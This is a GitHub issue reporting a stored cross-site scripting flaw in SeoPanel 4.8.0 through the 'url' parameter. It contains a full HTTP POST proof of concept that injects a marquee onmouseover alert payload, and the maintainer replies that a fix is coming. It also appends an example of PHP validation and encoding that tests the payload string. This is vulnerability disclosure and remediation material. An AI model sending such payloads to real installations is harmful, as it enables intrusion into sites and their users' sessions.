[BUG] Xss Stored #201

Closed
CloneAssassin opened this issue Dec 30, 2020 · 1 comment

CloneAssassin commented Dec 30, 2020

SeoPanel is vulnerable to stored XSS due to lack of filtration of user-supplied [Authenticated User]

Environment

SeoPanel version: 4.8.0 Last Version

Parameter:
name="url" [ works on all pages where the parameter is present ]

PoC

```http
POST /seo/seopanel/websites.php HTTP/1.1
Host: xxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: */*
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 203
Origin: xxx
DNT: 1
Connection: close
Referer: xxx
Cookie: PHPSESSID=xxx; hidenews=1

sec=update&oldName=test1&id=5&user_id=1&name=test1&url=https%3A%2F%2F%3Cmarquee+onmouseover%3D%22alert('Xss+12-30-2020')%22%3EoOo_(O.o)_oOo&title=test1&description=test1&keywords=test1&analytics_view_id=
```


request CVE

@sendtogeo

Hi Team,

Sorry for the late reply due to the new year vacation.

Thanks for reporting it to us and for the guidelines.

We will release a new version at the end of this month and will include fixes in it.

I will update you once it is released.

Thanks for the support.

sendtogeo added this to the Seo panel 4.9.0 milestone Jan 5, 2021
sendtogeo self-assigned this Mar 22, 2021
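
The class of fix this report calls for, as an added example that is not SeoPanel's code and not part of the original thread: validate the `url` field before it is stored, and HTML-encode it wherever it is rendered. The function names `validate_website_url` and `h` are hypothetical, the host check assumes plain ASCII DNS names (IDN and IPv6 literals are rejected), and how SeoPanel itself stores and prints the value is not shown on this page.

```php
<?php
declare(strict_types=1);

// Added example: hypothetical helpers, not SeoPanel code.

// Accept only absolute http(s) URLs whose host is a plain DNS name.
// Returns the URL unchanged, or null when it must be rejected.
function validate_website_url(string $raw): ?string
{
    $url = trim($raw);
    // Reject control characters, whitespace and markup delimiters outright.
    if ($url === '' || preg_match('/[\x00-\x20<>"\'\\\\]/', $url)) {
        return null;
    }
    $parts = parse_url($url);
    if ($parts === false || !isset($parts['scheme'], $parts['host'])) {
        return null;
    }
    if (!in_array(strtolower($parts['scheme']), ['http', 'https'], true)) {
        return null;
    }
    // Host must be dot-separated labels of letters, digits and hyphens.
    $label = '[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?';
    if (!preg_match('/^(?:' . $label . '\.)*' . $label . '$/i', $parts['host'])) {
        return null;
    }
    return $url;
}

// Encode a stored value for an HTML text or quoted-attribute context.
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Constructed inputs: the decoded `url` value from the report and a benign URL.
$samples = [
    'https://<marquee onmouseover="alert(\'Xss 12-30-2020\')">oOo_(O.o)_oOo',
    'https://example.com/path?a=1&b=2',
];
foreach ($samples as $s) {
    $verdict = validate_website_url($s) === null ? 'REJECT ' : 'ACCEPT ';
    echo $verdict . h($s) . PHP_EOL;
}
```

Output encoding is the control that matters for values already in the database; input validation alone does not neutralise rows stored before the check existed.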